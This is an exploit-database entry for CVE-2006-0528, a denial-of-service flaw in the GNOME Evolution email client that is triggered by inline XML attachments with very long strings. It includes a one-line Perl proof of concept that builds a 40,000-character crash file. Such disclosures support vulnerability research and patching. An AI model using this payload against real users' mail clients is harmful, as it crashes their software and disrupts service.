GNOME Evolution 2.2.3/2.3.x Inline XML File Attachment Buffer Overflow Vulnerability

2006-01-28T00:00:00
ID EDB-ID:27145
Type exploitdb
Reporter Mike Davis
Modified 2006-01-28T00:00:00

Description

GNOME Evolution 2.2.3/2.3.x Inline XML File Attachment Buffer Overflow Vulnerability. CVE-2006-0528. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/16408/info

GNOME Evolution email client is prone to a denial-of-service vulnerability when processing messages containing inline XML file attachments with excessively long strings. 


perl -e 'printf "A"x40000' > evolution-dos-poc.xml